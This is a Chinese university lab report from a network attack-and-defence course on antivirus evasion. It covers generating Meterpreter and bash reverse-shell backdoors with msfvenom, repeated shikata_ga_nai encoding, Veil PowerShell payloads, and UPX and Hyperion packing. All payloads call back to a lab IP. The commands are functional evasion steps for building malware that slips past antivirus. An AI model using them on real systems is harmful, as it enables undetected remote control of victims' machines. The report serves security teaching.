2019-2020-2 20175127丁新宇 《网络对抗技术》Exp3 免杀原理与实践

Exp3免杀原理与实践

一、实验内容

　　1、方法

　　　　正确使用msf编码器

　　　　msfvenom生成如jar之类的其他文件

　　　　veil

　　       加壳工具

    　　   使用C + shellcode编程

    　　   使用其他课堂未介绍方法

　　2、通过组合应用各种技术实现恶意代码免杀

　　3、用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

二、实验步骤

　　1、方法

　　①正确使用msf编码器

　　　将实验二的后门程序拿到virustotal检测，我们发现大多数杀软都能检测到该后门程序

　　　

 

　　　

　　　接下来我们使用msf编码器对该程序进行编码再来检测看看

　　　 msfvenom --list encoders 查看可以使用的编码方式

　　　选择这种 x86/shikata_ga_nai 方式进行编码

　　　先一次编码： msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai-b '\x00' LHOST=192.168.227.128 LPORT=5127 -f exe >20175113.exe 

　　　再八次编码： msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 8 -b '\x00' LHOST=192.168.227.128 LPORT=5127 -f exe >20175127cd2.exe 

　　　分别的检测情况如下图:

　　　　

 

 

　　　　

 　　　

 

 

 

　　②msfvenom生成如jar之类的其他文件

　　　生成java文件： msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.227.128 LPORT=5127 x> 20175127.jar 

　　　生成bash文件： msfvenom -p cmd/unix/reverse_bash LHOST=192.168.227.128 LPORT=5127 -f raw > 20175127.sh 

　　　分别的检测情况如下图：

　　　

　　　

　　③veil工具

　　　安装veil： sudo apt-get install veil-evasion 

　　　进入veil： veil 

　　　使用第一个： use 1 

　　　 list 列出所有的payload， use 22 选择第22个powershell/meterpreter/rev_tcp方式

　　　设置反弹连接的参数：

set LHOST 192.168.227.128 //ip地址
set LPORT 5127 //端口 generate //生成 20175127 //设置生成文件名

 

　　　检测情况如下：

　　　

　　　

　　④加壳工具

　　　对①中编码一次的程序进行压缩壳upx加壳： upx 20175127.exe -o 20175127.upxed.exe 

　　　对①中编码一次的程序进行加密壳Hyperion加壳：

　　　　复制该文件到hyperion文件夹中： cp 20175127.exe /usr/share/windows-resources/hyperion/20175127.exe 

　　　　进入hyperion文件夹中： cd /usr/share/windows-resources/hyperion/ 

　　　　加壳操作： wine hyperion.exe -v 20175127.exe 20175127.upxed.Hy.exe 

　　　分别的检测情况如下：